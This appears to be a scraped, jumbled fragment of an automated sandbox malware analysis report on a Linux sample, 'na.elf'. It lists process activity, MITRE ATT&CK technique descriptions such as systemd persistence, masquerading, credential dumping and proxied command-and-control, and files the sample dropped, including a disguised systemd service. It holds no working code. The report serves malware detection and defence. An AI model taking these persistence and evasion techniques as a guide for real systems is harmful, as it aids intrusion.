MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Process Activities

Process Overlayed (Exec)

Chronological Activities

Analysis Process: cut PID: 5673, Parent PID: 3585

General

Start time (UTC):	20:20:59
Start date (UTC):	25/03/2025
Path:	/usr/bin/cut
Arguments:	cut -c -80
File size:	47480 bytes
MD5 hash:	d8ed0ea8f22c0de0f8692d4d9f1759d3

File Activities

File Opened

File Read

Chronological Activities

Analysis Process: dash PID: 5674, Parent PID: 3585

General

Start time (UTC):	20:20:59
Start date (UTC):	25/03/2025
Path:	/usr/bin/dash
Arguments:	-
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Process Activities

Process Overlayed (Exec)

Chronological Activities

Analysis Process: rm PID: 5674, Parent PID: 3585

General

Start time (UTC):	20:20:59
Start date (UTC):	25/03/2025
Path:	/usr/bin/rm
Arguments:	rm -f /tmp/tmp.kfY4W8g8cA /tmp/tmp.UsnA55A3DA /tmp/tmp.lNnnmoNhXs
File size:	72056 bytes
MD5 hash:	aa2b5496fdbfd88e38791ab81f90b95b

Description:	This technique has been deprecated. Please use Command and Scripting Interpreter where appropriate.
Tactics:	Defense Evasion, Execution
Data Sources:
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may create or modify systemd services to repeatedly execute malicious payloads as part of persistence. Systemd is a system and service manager commonly used for managing background daemon processes (also known as services) and other system resources.Systemd is the default initialization (init) system on many Linux distributions replacing legacy init systems, including SysVinit and Upstart, while remaining backwards compatible.
Tactics:	Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, File: File Creation, File: File Modification, Process: Process Creation, Service: Service Creation, Service: Service Modification
Platforms:	Linux
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify file or directory permissions/attributes to evade access control lists (ACLs) and access protected files.File and directory permissions are commonly managed by ACLs configured by the file or directory owner, or users with the appropriate permissions. File and directory ACL implementations vary by platform, but generally explicitly designate which users or groups can perform which actions (read, write, execute, etc.).
Tactics:	Defense Evasion
Data Sources:	Active Directory: Active Directory Object Modification, Command: Command Execution, File: File Metadata, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may set files and directories to be hidden to evade detection mechanisms. To prevent normal users from accidentally changing special files on a system, most operating systems have the concept of a ‘hidden’ file. These files don’t show up when a user browses the file system with a GUI or when using normal commands on the command line. Users must explicitly ask to show the hidden files either via a series of Graphical User Interface (GUI) prompts or with command line switches ( `dir /a` for Windows and `ls –a` for Linux and macOS).
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may delete files left behind by the actions of their intrusion activity. Malware, tools, or other non-native files dropped or created on a system by an adversary (ex: Ingress Tool Transfer ) may leave traces to indicate to what was done within a network and how. Removal of these files can occur during an intrusion, or as part of a post-intrusion process to minimize the adversary's footprint.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Deletion
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use a connection proxy to direct network traffic between systems or act as an intermediary for network communications to a command and control server to avoid direct connections to their infrastructure. Many tools exist that enable traffic redirection through proxies or port redirection, including HTRAN , ZXProxy, and ZXPortMap. Adversaries use these types of proxies to manage command and control communications, reduce the number of simultaneous outbound network connections, provide resiliency in the face of connection loss, or to ride over existing trusted communications paths between victims to avoid suspicion. Adversaries may chain together multiple proxies to further disguise the source of malicious traffic.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Linux Analysis Report na.elf

Overview

General Information

Detection

Signatures

Classification

General Information

Runtime Messages

Process Tree

Malware Threat Intel

Yara Signatures

Initial Sample

Dropped Files

Memory Dumps

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Bitcoin Miner

Networking

System Summary

Data Obfuscation

Persistence and Installation Behavior

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Mitre Att&ck Matrix

Malware Configuration

Behavior Graph

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

/etc/CommId

/memfd:snapd-env-generator (deleted)

/usr/lib/systemd/system/uplugplay.service

/usr/sbin/uplugplay

/var/lib/fwupd/gnupg/.#lk0x00005570808bbb80.galassia.5626

/var/lib/fwupd/gnupg/.#lk0x0000559239bcdb80.galassia.5641

/var/lib/fwupd/gnupg/.#lk0x000055965eb8bb80.galassia.5643

/var/lib/fwupd/gnupg/.#lk0x0000561fb6af5b80.galassia.5635

/var/lib/fwupd/gnupg/pubring.kbx.tmp

Static File Info

General

Static ELF Info

ELF header

Program Segments

Network Behavior

Suricata IDS Alerts

Network Port Distribution

TCP Packets

UDP Packets

DNS Queries

DNS Answers

HTTP Request Dependency Graph

HTTP Packets

HTTPS Proxied Packets

System Behavior

Analysis Process: na.elf PID: 5399, Parent PID: 5323

Linux Analysis Report
na.elf